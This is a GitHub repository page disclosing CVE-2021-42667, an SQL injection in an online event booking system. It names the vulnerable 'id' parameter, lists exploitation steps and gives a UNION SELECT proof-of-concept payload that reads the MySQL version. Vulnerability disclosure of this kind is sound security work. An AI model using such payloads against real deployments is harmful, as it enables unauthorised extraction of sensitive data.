Skip to content

CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.

Notifications You must be signed in to change notification settings

0xDeku/CVE-2021-42667

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 

Repository files navigation

CVE-2021-42667

CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system version 2.3.0.

Technical description:

An SQL Injection vulnerability exists in the Event management software version 2.3.0. An attacker can leverage the vulnerable "id" parameter in the "USER" web page in order to manipulate the sql query performed. As a result the attacker can extract sensitive data from the web server.

Vulnerable page - USER

Vulnerable parameter - "id"

Steps to exploit:

  1. Navigate to http://localhost/event-management/views/?v=USER&ID=1
  2. Insert your payload in the id parameter

Proof of concept (Poc) -

The following payload will allow you to extract the MySql server version running on the web server -

UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL;-- -

CVE-2021-42667

References -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42667

https://nvd.nist.gov/vuln/detail/CVE-2021-42667

Discovered by -

Alon Leviev(0xDeku), 22 October, 2021.

About

CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages